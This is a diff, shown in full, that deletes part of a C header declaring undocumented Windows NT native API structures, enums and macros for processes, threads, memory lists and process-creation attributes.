-#define TRACELOG_CREATE_ONDISK 0x0040
-#define TRACELOG_GUID_ENABLE 0x0080
-#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100
-#define TRACELOG_CREATE_INPROC 0x0200
-#define TRACELOG_ACCESS_REALTIME 0x0400
-#define TRACELOG_REGISTER_GUIDS 0x0800
-
-//
-// Memory Partition Object Access Rights
-//
-#define MEMORY_PARTITION_QUERY_ACCESS 0x0001
-#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002
-
-#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \
- SYNCHRONIZE | \
- MEMORY_PARTITION_QUERY_ACCESS | \
- MEMORY_PARTITION_MODIFY_ACCESS)
-
-//
-// NtCreateProcessEx specific flags.
-//
-#define PS_REQUEST_BREAKAWAY 1
-#define PS_NO_DEBUG_INHERIT 2
-#define PS_INHERIT_HANDLES 4
-#define PS_LARGE_PAGES 8
-#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
- PS_NO_DEBUG_INHERIT | \
- PS_INHERIT_HANDLES | \
- PS_LARGE_PAGES)
-
-//
-// Define special ByteOffset parameters for read and write operations
-//
-#define FILE_WRITE_TO_END_OF_FILE 0xffffffff
-#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe
-
-//
-// This is the maximum MaximumLength for a UNICODE_STRING.
-//
-#define MAXUSHORT 0xffff
-#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )
-
-typedef struct _EX_RUNDOWN_REF {
- union
- {
- ULONG Count;
- PVOID Ptr;
- };
-} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF;
-
-#ifdef _WIN64
-#define MAX_FAST_REFS 15
-#else
-#define MAX_FAST_REFS 7
-#endif
-
-typedef struct _EX_FAST_REF {
- union {
- PVOID Object;
-#if defined (_WIN64)
- ULONG_PTR RefCnt : 4;
-#else
- ULONG_PTR RefCnt : 3;
-#endif
- ULONG_PTR Value;
- };
-} EX_FAST_REF, *PEX_FAST_REF;
-
-typedef struct _UNICODE_STRING {
- USHORT Length;
- USHORT MaximumLength;
- PWSTR Buffer;
-} UNICODE_STRING;
-typedef UNICODE_STRING *PUNICODE_STRING;
-typedef const UNICODE_STRING *PCUNICODE_STRING;
-
-#ifndef STATIC_UNICODE_STRING
-#define STATIC_UNICODE_STRING(string, value) \
- static UNICODE_STRING string = { sizeof(value) - sizeof(WCHAR), sizeof(value), value };
-#endif
-
-typedef struct _STRING {
- USHORT Length;
- USHORT MaximumLength;
- PCHAR Buffer;
-} STRING;
-typedef STRING *PSTRING;
-
-typedef STRING ANSI_STRING;
-typedef PSTRING PANSI_STRING;
-
-typedef STRING OEM_STRING;
-typedef PSTRING POEM_STRING;
-typedef CONST STRING* PCOEM_STRING;
-typedef CONST char *PCSZ;
-
-typedef struct _CSTRING {
- USHORT Length;
- USHORT MaximumLength;
- CONST char *Buffer;
-} CSTRING;
-typedef CSTRING *PCSTRING;
-#define ANSI_NULL ((CHAR)0)
-
-typedef STRING CANSI_STRING;
-typedef PSTRING PCANSI_STRING;
-
-typedef struct _OBJECT_ATTRIBUTES {
- ULONG Length;
- HANDLE RootDirectory;
- PUNICODE_STRING ObjectName;
- ULONG Attributes;
- PVOID SecurityDescriptor;
- PVOID SecurityQualityOfService;
-} OBJECT_ATTRIBUTES;
-typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
-
-typedef struct _IO_STATUS_BLOCK {
- union {
- NTSTATUS Status;
- PVOID Pointer;
- } DUMMYUNIONNAME;
-
- ULONG_PTR Information;
-} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
-
-/*
-** FileCache and MemoryList START
-*/
-
-typedef enum _SYSTEM_MEMORY_LIST_COMMAND {
- MemoryCaptureAccessedBits,
- MemoryCaptureAndResetAccessedBits,
- MemoryEmptyWorkingSets,
- MemoryFlushModifiedList,
- MemoryPurgeStandbyList,
- MemoryPurgeLowPriorityStandbyList,
- MemoryCommandMax
-} SYSTEM_MEMORY_LIST_COMMAND;
-
-typedef struct _SYSTEM_FILECACHE_INFORMATION {
- SIZE_T CurrentSize;
- SIZE_T PeakSize;
- ULONG PageFaultCount;
- SIZE_T MinimumWorkingSet;
- SIZE_T MaximumWorkingSet;
- SIZE_T CurrentSizeIncludingTransitionInPages;
- SIZE_T PeakSizeIncludingTransitionInPages;
- ULONG TransitionRePurposeCount;
- ULONG Flags;
-} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION;
-
-/*
-** FileCache and MemoryList END
-*/
-
-/*
-** Processes START
-*/
-
-typedef struct _SYSTEM_TIMEOFDAY_INFORMATION {
- LARGE_INTEGER BootTime;
- LARGE_INTEGER CurrentTime;
- LARGE_INTEGER TimeZoneBias;
- ULONG TimeZoneId;
- ULONG Reserved;
- ULONGLONG BootTimeBias;
- ULONGLONG SleepTimeBias;
-} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION;
-
-typedef enum _THREAD_STATE {
- StateInitialized,
- StateReady,
- StateRunning,
- StateStandby,
- StateTerminated,
- StateWait,
- StateTransition,
- StateUnknown
-} THREAD_STATE;
-
-typedef enum _KWAIT_REASON {
- Executive,
- FreePage,
- PageIn,
- PoolAllocation,
- DelayExecution,
- Suspended,
- UserRequest,
- WrExecutive,
- WrFreePage,
- WrPageIn,
- WrPoolAllocation,
- WrDelayExecution,
- WrSuspended,
- WrUserRequest,
- WrEventPair,
- WrQueue,
- WrLpcReceive,
- WrLpcReply,
- WrVirtualMemory,
- WrPageOut,
- WrRendezvous,
- WrKeyedEvent,
- WrTerminated,
- WrProcessInSwap,
- WrCpuRateControl,
- WrCalloutStack,
- WrKernel,
- WrResource,
- WrPushLock,
- WrMutex,
- WrQuantumEnd,
- WrDispatchInt,
- WrPreempted,
- WrYieldExecution,
- WrFastMutex,
- WrGuardedMutex,
- WrRundown,
- WrAlertByThreadId,
- WrDeferredPreempt,
- MaximumWaitReason
-} KWAIT_REASON;
-
-typedef VOID KSTART_ROUTINE(
- _In_ PVOID StartContext
-);
-typedef KSTART_ROUTINE *PKSTART_ROUTINE;
-
-typedef struct _CLIENT_ID {
- HANDLE UniqueProcess;
- HANDLE UniqueThread;
-} CLIENT_ID, *PCLIENT_ID;
-
-typedef struct _CLIENT_ID64 {
- ULONG64 UniqueProcess;
- ULONG64 UniqueThread;
-} CLIENT_ID64, *PCLIENT_ID64;
-
-typedef struct _CLIENT_ID32 {
- ULONG32 UniqueProcess;
- ULONG32 UniqueThread;
-} CLIENT_ID32, *PCLIENT_ID32;
-
-typedef struct _VM_COUNTERS {
- SIZE_T PeakVirtualSize;
- SIZE_T VirtualSize;
- ULONG PageFaultCount;
- SIZE_T PeakWorkingSetSize;
- SIZE_T WorkingSetSize;
- SIZE_T QuotaPeakPagedPoolUsage;
- SIZE_T QuotaPagedPoolUsage;
- SIZE_T QuotaPeakNonPagedPoolUsage;
- SIZE_T QuotaNonPagedPoolUsage;
- SIZE_T PagefileUsage;
- SIZE_T PeakPagefileUsage;
- SIZE_T PrivatePageCount;
-} VM_COUNTERS;
-
-typedef struct _SYSTEM_THREAD_INFORMATION {
- LARGE_INTEGER KernelTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER CreateTime;
- ULONG WaitTime;
- PVOID StartAddress;
- CLIENT_ID ClientId;
- KPRIORITY Priority;
- KPRIORITY BasePriority;
- ULONG ContextSwitchCount;
- THREAD_STATE State;
- KWAIT_REASON WaitReason;
-} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
-
-typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION {
- SYSTEM_THREAD_INFORMATION ThreadInfo;
- PVOID StackBase;
- PVOID StackLimit;
- PVOID Win32StartAddress;
- PVOID TebBase;
- ULONG_PTR Reserved2;
- ULONG_PTR Reserved3;
- ULONG_PTR Reserved4;
-} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;
-
-typedef struct _SYSTEM_PROCESSES_INFORMATION {
- ULONG NextEntryDelta;
- ULONG ThreadCount;
- LARGE_INTEGER SpareLi1;
- LARGE_INTEGER SpareLi2;
- LARGE_INTEGER SpareLi3;
- LARGE_INTEGER CreateTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER KernelTime;
- UNICODE_STRING ImageName;
- KPRIORITY BasePriority;
- HANDLE UniqueProcessId;
- HANDLE InheritedFromUniqueProcessId;
- ULONG HandleCount;
- ULONG SessionId;
- ULONG_PTR PageDirectoryBase;
- VM_COUNTERS VmCounters;
- IO_COUNTERS IoCounters;
- SYSTEM_THREAD_INFORMATION Threads[1];
-} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION;
-
-typedef enum _SYSTEM_PROCESS_CLASSIFICATION {
- SystemProcessClassificationNormal,
- SystemProcessClassificationSystem,
- SystemProcessClassificationSecureSystem,
- SystemProcessClassificationMemCompression,
- SystemProcessClassificationRegistry,
- SystemProcessClassificationMaximum
-} SYSTEM_PROCESS_CLASSIFICATION;
-
-typedef struct _PROCESS_DISK_COUNTERS {
- ULONGLONG BytesRead;
- ULONGLONG BytesWritten;
- ULONGLONG ReadOperationCount;
- ULONGLONG WriteOperationCount;
- ULONGLONG FlushOperationCount;
-} PROCESS_DISK_COUNTERS, *PPROCESS_DISK_COUNTERS;
-
-typedef union _ENERGY_STATE_DURATION {
- union
- {
- ULONGLONG Value;
- ULONG LastChangeTime;
- };
-
- ULONG Duration : 31;
- ULONG IsInState : 1;
-} ENERGY_STATE_DURATION, *PENERGY_STATE_DURATION;
-
-typedef struct _PROCESS_ENERGY_VALUES {
- ULONGLONG Cycles[2][4];
- ULONGLONG DiskEnergy;
- ULONGLONG NetworkTailEnergy;
- ULONGLONG MBBTailEnergy;
- ULONGLONG NetworkTxRxBytes;
- ULONGLONG MBBTxRxBytes;
- union
- {
- ENERGY_STATE_DURATION Durations[3];
- struct
- {
- ENERGY_STATE_DURATION ForegroundDuration;
- ENERGY_STATE_DURATION DesktopVisibleDuration;
- ENERGY_STATE_DURATION PSMForegroundDuration;
- };
- };
- ULONG CompositionRendered;
- ULONG CompositionDirtyGenerated;
- ULONG CompositionDirtyPropagated;
- ULONG Reserved1;
- ULONGLONG AttributedCycles[4][2];
- ULONGLONG WorkOnBehalfCycles[4][2];
-} PROCESS_ENERGY_VALUES, *PPROCESS_ENERGY_VALUES;
-
-typedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION {
- PROCESS_DISK_COUNTERS DiskCounters;
- ULONGLONG ContextSwitches;
- union
- {
- ULONG Flags;
- struct
- {
- ULONG HasStrongId : 1;
- ULONG Classification : 4; // SYSTEM_PROCESS_CLASSIFICATION
- ULONG BackgroundActivityModerated : 1;
- ULONG Spare : 26;
- };
- };
- ULONG UserSidOffset;
- ULONG PackageFullNameOffset;
- PROCESS_ENERGY_VALUES EnergyValues;
- ULONG AppIdOffset;
- SIZE_T SharedCommitCharge;
- ULONG JobObjectId;
- ULONG SpareUlong;
- ULONGLONG ProcessSequenceNumber;
-} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION;
-
-typedef struct _SYSTEM_PROCESSES_FULL_INFORMATION {
- SYSTEM_PROCESSES_INFORMATION ProcessAndThreads;
- SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo;
-} SYSTEM_PROCESSES_FULL_INFORMATION, *PSYSTEM_PROCESSES_FULL_INFORMATION;
-
-typedef struct _SYSTEM_PROCESS_ID_INFORMATION {
- HANDLE ProcessId;
- UNICODE_STRING ImageName;
-} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION;
-
-typedef struct _SYSTEM_SECUREBOOT_INFORMATION {
- BOOLEAN SecureBootEnabled;
- BOOLEAN SecureBootCapable;
-} SYSTEM_SECUREBOOT_INFORMATION, *PSYSTEM_SECUREBOOT_INFORMATION;
-
-typedef struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION {
- GUID PolicyPublisher;
- ULONG PolicyVersion;
- ULONG PolicyOptions;
-} SYSTEM_SECUREBOOT_POLICY_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_INFORMATION;
-
-typedef struct _SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION {
- SYSTEM_SECUREBOOT_POLICY_INFORMATION PolicyInformation;
- ULONG PolicySize;
- UCHAR Policy[1];
-} SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION;
-
-typedef struct _SYSTEM_BASIC_INFORMATION {
- ULONG Reserved;
- ULONG TimerResolution;
- ULONG PageSize;
- ULONG NumberOfPhysicalPages;
- ULONG LowestPhysicalPageNumber;
- ULONG HighestPhysicalPageNumber;
- ULONG AllocationGranularity;
- ULONG_PTR MinimumUserModeAddress;
- ULONG_PTR MaximumUserModeAddress;
- ULONG_PTR ActiveProcessorsAffinityMask;
- CCHAR NumberOfProcessors;
-} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;
-
-typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {
- BOOLEAN SecureKernelRunning : 1;
- BOOLEAN HvciEnabled : 1;
- BOOLEAN HvciStrictMode : 1;
- BOOLEAN DebugEnabled : 1;
- BOOLEAN FirmwarePageProtection : 1;
- BOOLEAN SpareFlags : 1;
- BOOLEAN TrustletRunning : 1;
- BOOLEAN SpareFlags2 : 1;
- BOOLEAN Spare0[6];
- ULONGLONG Spare1;
-} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;
-
-typedef enum _PROCESSINFOCLASS {
- ProcessBasicInformation = 0,
- ProcessQuotaLimits = 1,
- ProcessIoCounters = 2,
- ProcessVmCounters = 3,
- ProcessTimes = 4,
- ProcessBasePriority = 5,
- ProcessRaisePriority = 6,
- ProcessDebugPort = 7,
- ProcessExceptionPort = 8,
- ProcessAccessToken = 9,
- ProcessLdtInformation = 10,
- ProcessLdtSize = 11,
- ProcessDefaultHardErrorMode = 12,
- ProcessIoPortHandlers = 13,
- ProcessPooledUsageAndLimits = 14,
- ProcessWorkingSetWatch = 15,
- ProcessUserModeIOPL = 16,
- ProcessEnableAlignmentFaultFixup = 17,
- ProcessPriorityClass = 18,
- ProcessWx86Information = 19,
- ProcessHandleCount = 20,
- ProcessAffinityMask = 21,
- ProcessPriorityBoost = 22,
- ProcessDeviceMap = 23,
- ProcessSessionInformation = 24,
- ProcessForegroundInformation = 25,
- ProcessWow64Information = 26,
- ProcessImageFileName = 27,
- ProcessLUIDDeviceMapsEnabled = 28,
- ProcessBreakOnTermination = 29,
- ProcessDebugObjectHandle = 30,
- ProcessDebugFlags = 31,
- ProcessHandleTracing = 32,
- ProcessIoPriority = 33,
- ProcessExecuteFlags = 34,
- ProcessTlsInformation = 35,
- ProcessCookie = 36,
- ProcessImageInformation = 37,
- ProcessCycleTime = 38,
- ProcessPagePriority = 39,
- ProcessInstrumentationCallback = 40,
- ProcessThreadStackAllocation = 41,
- ProcessWorkingSetWatchEx = 42,
- ProcessImageFileNameWin32 = 43,
- ProcessImageFileMapping = 44,
- ProcessAffinityUpdateMode = 45,
- ProcessMemoryAllocationMode = 46,
- ProcessGroupInformation = 47,
- ProcessTokenVirtualizationEnabled = 48,
- ProcessOwnerInformation = 49,
- ProcessWindowInformation = 50,
- ProcessHandleInformation = 51,
- ProcessMitigationPolicy = 52,
- ProcessDynamicFunctionTableInformation = 53,
- ProcessHandleCheckingMode = 54,
- ProcessKeepAliveCount = 55,
- ProcessRevokeFileHandles = 56,
- ProcessWorkingSetControl = 57,
- ProcessHandleTable = 58,
- ProcessCheckStackExtentsMode = 59,
- ProcessCommandLineInformation = 60,
- ProcessProtectionInformation = 61,
- ProcessMemoryExhaustion = 62,
- ProcessFaultInformation = 63,
- ProcessTelemetryIdInformation = 64,
- ProcessCommitReleaseInformation = 65,
- ProcessDefaultCpuSetsInformation = 66,
- ProcessAllowedCpuSetsInformation = 67,
- ProcessSubsystemProcess = 68,
- ProcessJobMemoryInformation = 69,
- ProcessInPrivate = 70,
- ProcessRaiseUMExceptionOnInvalidHandleClose = 71,
- ProcessIumChallengeResponse = 72,
- ProcessChildProcessInformation = 73,
- ProcessHighGraphicsPriorityInformation = 74,
- ProcessSubsystemInformation = 75,
- ProcessEnergyValues = 76,
- ProcessActivityThrottleState = 77,
- ProcessActivityThrottlePolicy = 78,
- ProcessWin32kSyscallFilterInformation = 79,
- ProcessDisableSystemAllowedCpuSets = 80,
- ProcessWakeInformation = 81,
- ProcessEnergyTrackingState = 82,
- ProcessManageWritesToExecutableMemory = 83,
- ProcessCaptureTrustletLiveDump = 84,
- ProcessTelemetryCoverage = 85,
- ProcessEnclaveInformation = 86,
- ProcessEnableReadWriteVmLogging = 87,
- ProcessUptimeInformation = 88,
- ProcessImageSection = 89,
- ProcessDebugAuthInformation = 90,
- ProcessSystemResourceManagement = 91,
- ProcessSequenceNumber = 92,
- ProcessLoaderDetour = 93,
- ProcessSecurityDomainInformation = 93,
- ProcessCombineSecurityDomainsInformation = 94,
- ProcessEnableLogging = 95,
- ProcessLeapSecondInformation = 96,
- MaxProcessInfoClass
-} PROCESSINFOCLASS;
-
-typedef enum _THREADINFOCLASS {
- ThreadBasicInformation,
- ThreadTimes,
- ThreadPriority,
- ThreadBasePriority,
- ThreadAffinityMask,
- ThreadImpersonationToken,
- ThreadDescriptorTableEntry,
- ThreadEnableAlignmentFaultFixup,
- ThreadEventPair,
- ThreadQuerySetWin32StartAddress,
- ThreadZeroTlsCell,
- ThreadPerformanceCount,
- ThreadAmILastThread,
- ThreadIdealProcessor,
- ThreadPriorityBoost,
- ThreadSetTlsArrayAddress,
- ThreadIsIoPending,
- ThreadHideFromDebugger,
- ThreadBreakOnTermination,
- ThreadSwitchLegacyState,
- ThreadIsTerminated,
- ThreadLastSystemCall,
- ThreadIoPriority,
- ThreadCycleTime,
- ThreadPagePriority,
- ThreadActualBasePriority,
- ThreadTebInformation,
- ThreadCSwitchMon,
- ThreadCSwitchPmu,
- ThreadWow64Context,
- ThreadGroupInformation,
- ThreadUmsInformation,
- ThreadCounterProfiling,
- ThreadIdealProcessorEx,
- ThreadCpuAccountingInformation,
- ThreadSuspendCount,
- ThreadHeterogeneousCpuPolicy,
- ThreadContainerId,
- ThreadNameInformation,
- ThreadSelectedCpuSets,
- ThreadSystemThreadInformation,
- ThreadActualGroupAffinity,
- ThreadDynamicCodePolicyInfo,
- ThreadExplicitCaseSensitivity,
- ThreadWorkOnBehalfTicket,
- ThreadSubsystemInformation,
- ThreadDbgkWerReportActive,
- ThreadAttachContainer,
- ThreadManageWritesToExecutableMemory,
- ThreadPowerThrottlingState,
- ThreadWorkloadClass,
- MaxThreadInfoClass
-} THREADINFOCLASS;
-
-typedef struct _PROCESS_BASIC_INFORMATION {
- NTSTATUS ExitStatus;
- PVOID PebBaseAddress;
- ULONG_PTR AffinityMask;
- KPRIORITY BasePriority;
- ULONG_PTR UniqueProcessId;
- ULONG_PTR InheritedFromUniqueProcessId;
-} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
-
-typedef struct _THREAD_BASIC_INFORMATION {
- NTSTATUS ExitStatus;
- PVOID TebBaseAddress;
- CLIENT_ID ClientId;
- ULONG_PTR AffinityMask;
- KPRIORITY Priority;
- LONG BasePriority;
-} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;
-
-typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {
- SIZE_T Size;
- PROCESS_BASIC_INFORMATION BasicInfo;
- union
- {
- ULONG Flags;
- struct
- {
- ULONG IsProtectedProcess : 1;
- ULONG IsWow64Process : 1;
- ULONG IsProcessDeleting : 1;
- ULONG IsCrossSessionCreate : 1;
- ULONG IsFrozen : 1;
- ULONG IsBackground : 1;
- ULONG IsStronglyNamed : 1;
- ULONG IsSecureProcess : 1;
- ULONG IsSubsystemProcess : 1;
- ULONG SpareBits : 23;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;
-
-typedef struct _PROCESS_ACCESS_TOKEN {
- HANDLE Token;
- HANDLE Thread;
-} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;
-
-typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
- HANDLE HandleValue;
- ULONG_PTR HandleCount;
- ULONG_PTR PointerCount;
- ULONG GrantedAccess;
- ULONG ObjectTypeIndex;
- ULONG HandleAttributes;
- ULONG Reserved;
-} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;
-
-typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
- ULONG NumberOfHandles;
- ULONG Reserved;
- PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
-} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
-
-typedef enum _PS_MITIGATION_OPTION {
- PS_MITIGATION_OPTION_NX,
- PS_MITIGATION_OPTION_SEHOP,
- PS_MITIGATION_OPTION_FORCE_RELOCATE_IMAGES,
- PS_MITIGATION_OPTION_HEAP_TERMINATE,
- PS_MITIGATION_OPTION_BOTTOM_UP_ASLR,
- PS_MITIGATION_OPTION_HIGH_ENTROPY_ASLR,
- PS_MITIGATION_OPTION_STRICT_HANDLE_CHECKS,
- PS_MITIGATION_OPTION_WIN32K_SYSTEM_CALL_DISABLE,
- PS_MITIGATION_OPTION_EXTENSION_POINT_DISABLE,
- PS_MITIGATION_OPTION_PROHIBIT_DYNAMIC_CODE,
- PS_MITIGATION_OPTION_CONTROL_FLOW_GUARD,
- PS_MITIGATION_OPTION_BLOCK_NON_MICROSOFT_BINARIES,
- PS_MITIGATION_OPTION_FONT_DISABLE,
- PS_MITIGATION_OPTION_IMAGE_LOAD_NO_REMOTE,
- PS_MITIGATION_OPTION_IMAGE_LOAD_NO_LOW_LABEL,
- PS_MITIGATION_OPTION_IMAGE_LOAD_PREFER_SYSTEM32,
- PS_MITIGATION_OPTION_RETURN_FLOW_GUARD,
- PS_MITIGATION_OPTION_LOADER_INTEGRITY_CONTINUITY,
- PS_MITIGATION_OPTION_STRICT_CONTROL_FLOW_GUARD,
- PS_MITIGATION_OPTION_RESTRICT_SET_THREAD_CONTEXT,
- PS_MITIGATION_OPTION_ROP_STACKPIVOT,
- PS_MITIGATION_OPTION_ROP_CALLER_CHECK,
- PS_MITIGATION_OPTION_ROP_SIMEXEC,
- PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER,
- PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER_PLUS,
- PS_MITIGATION_OPTION_RESTRICT_CHILD_PROCESS_CREATION,
- PS_MITIGATION_OPTION_IMPORT_ADDRESS_FILTER,
- PS_MITIGATION_OPTION_MODULE_TAMPERING_PROTECTION,
- PS_MITIGATION_OPTION_RESTRICT_INDIRECT_BRANCH_PREDICTION,
- PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE,
- PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY,
- PS_MITIGATION_OPTION_CET_SHADOW_STACKS
-} PS_MITIGATION_OPTION;
-
-typedef enum _PS_CREATE_STATE {
- PsCreateInitialState,
- PsCreateFailOnFileOpen,
- PsCreateFailOnSectionCreate,
- PsCreateFailExeFormat,
- PsCreateFailMachineMismatch,
- PsCreateFailExeName,
- PsCreateSuccess,
- PsCreateMaximumStates
-} PS_CREATE_STATE;
-
-typedef struct _PS_CREATE_INFO {
- SIZE_T Size;
- PS_CREATE_STATE State;
- union
- {
- struct
- {
- union
- {
- ULONG InitFlags;
- struct
- {
- UCHAR WriteOutputOnExit : 1;
- UCHAR DetectManifest : 1;
- UCHAR IFEOSkipDebugger : 1;
- UCHAR IFEODoNotPropagateKeyState : 1;
- UCHAR SpareBits1 : 4;
- UCHAR SpareBits2 : 8;
- USHORT ProhibitedImageCharacteristics : 16;
- };
- };
- ACCESS_MASK AdditionalFileAccess;
- } InitState;
-
- struct
- {
- HANDLE FileHandle;
- } FailSection;
-
- struct
- {
- USHORT DllCharacteristics;
- } ExeFormat;
-
- struct
- {
- HANDLE IFEOKey;
- } ExeName;
-
- struct
- {
- union
- {
- ULONG OutputFlags;
- struct
- {
- UCHAR ProtectedProcess : 1;
- UCHAR AddressSpaceOverride : 1;
- UCHAR DevOverrideEnabled : 1;
- UCHAR ManifestDetected : 1;
- UCHAR ProtectedProcessLight : 1;
- UCHAR SpareBits1 : 3;
- UCHAR SpareBits2 : 8;
- USHORT SpareBits3 : 16;
- };
- };
- HANDLE FileHandle;
- HANDLE SectionHandle;
- ULONGLONG UserProcessParametersNative;
- ULONG UserProcessParametersWow64;
- ULONG CurrentParameterFlags;
- ULONGLONG PebAddressNative;
- ULONG PebAddressWow64;
- ULONGLONG ManifestAddress;
- ULONG ManifestSize;
- } SuccessState;
- };
-} PS_CREATE_INFO, *PPS_CREATE_INFO;
-
-typedef struct _PS_ATTRIBUTE {
- ULONG Attribute;
- SIZE_T Size;
- union
- {
- ULONG Value;
- PVOID ValuePtr;
- };
- PSIZE_T ReturnLength;
-} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
-
-typedef struct _PS_ATTRIBUTE_LIST {
- SIZE_T TotalLength;
- PS_ATTRIBUTE Attributes[1];
-} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
-
-typedef enum _PS_PROTECTED_TYPE {
- PsProtectedTypeNone,
- PsProtectedTypeProtectedLight,
- PsProtectedTypeProtected,
- PsProtectedTypeMax
-} PS_PROTECTED_TYPE;
-
-typedef enum _PS_PROTECTED_SIGNER {
- PsProtectedSignerNone,
- PsProtectedSignerAuthenticode,
- PsProtectedSignerCodeGen,
- PsProtectedSignerAntimalware,
- PsProtectedSignerLsa,
- PsProtectedSignerWindows,
- PsProtectedSignerWinTcb,
- PsProtectedSignerWinSystem,
- PsProtectedSignerApp,
- PsProtectedSignerMax
-} PS_PROTECTED_SIGNER;
-
-typedef struct _PS_PROTECTION {
- union
- {
- UCHAR Level;
- struct
- {
- UCHAR Type : 3;
- UCHAR Audit : 1;
- UCHAR Signer : 4;
- };
- };
-} PS_PROTECTION, *PPS_PROTECTION;
-
-// begin_rev
-#define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff
-#define PS_ATTRIBUTE_THREAD 0x00010000
-#define PS_ATTRIBUTE_INPUT 0x00020000
-#define PS_ATTRIBUTE_ADDITIVE 0x00040000
-// end_rev
-
-typedef enum _PS_ATTRIBUTE_NUM {
- PsAttributeParentProcess,
- PsAttributeDebugPort,
- PsAttributeToken,
- PsAttributeClientId,
- PsAttributeTebAddress,
- PsAttributeImageName,
- PsAttributeImageInfo,
- PsAttributeMemoryReserve,
- PsAttributePriorityClass,
- PsAttributeErrorMode,
- PsAttributeStdHandleInfo,
- PsAttributeHandleList,
- PsAttributeGroupAffinity,
- PsAttributePreferredNode,
- PsAttributeIdealProcessor,
- PsAttributeUmsThread,
- PsAttributeMitigationOptions,
- PsAttributeProtectionLevel,
- PsAttributeSecureProcess,
- PsAttributeJobList,
- PsAttributeChildProcessPolicy,
- PsAttributeAllApplicationPackagesPolicy,
- PsAttributeWin32kFilter,
- PsAttributeSafeOpenPromptOriginClaim,
- PsAttributeBnoIsolation,
- PsAttributeDesktopAppPolicy,
- PsAttributeChpe,
- PsAttributeMax
-} PS_ATTRIBUTE_NUM;
-
-#define PsAttributeValue(Number, Thread, Input, Unknown) \
- (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \
- ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \
- ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \
- ((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0))
-
-#define PS_ATTRIBUTE_PARENT_PROCESS \
- PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_DEBUG_PORT \
- PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_TOKEN \
- PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_CLIENT_ID \
- PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)
-#define PS_ATTRIBUTE_TEB_ADDRESS \
- PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)
-#define PS_ATTRIBUTE_IMAGE_NAME \
- PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_IMAGE_INFO \
- PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)
-#define PS_ATTRIBUTE_MEMORY_RESERVE \
- PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_PRIORITY_CLASS \
- PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_ERROR_MODE \
- PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_STD_HANDLE_INFO \
- PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_HANDLE_LIST \
- PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)
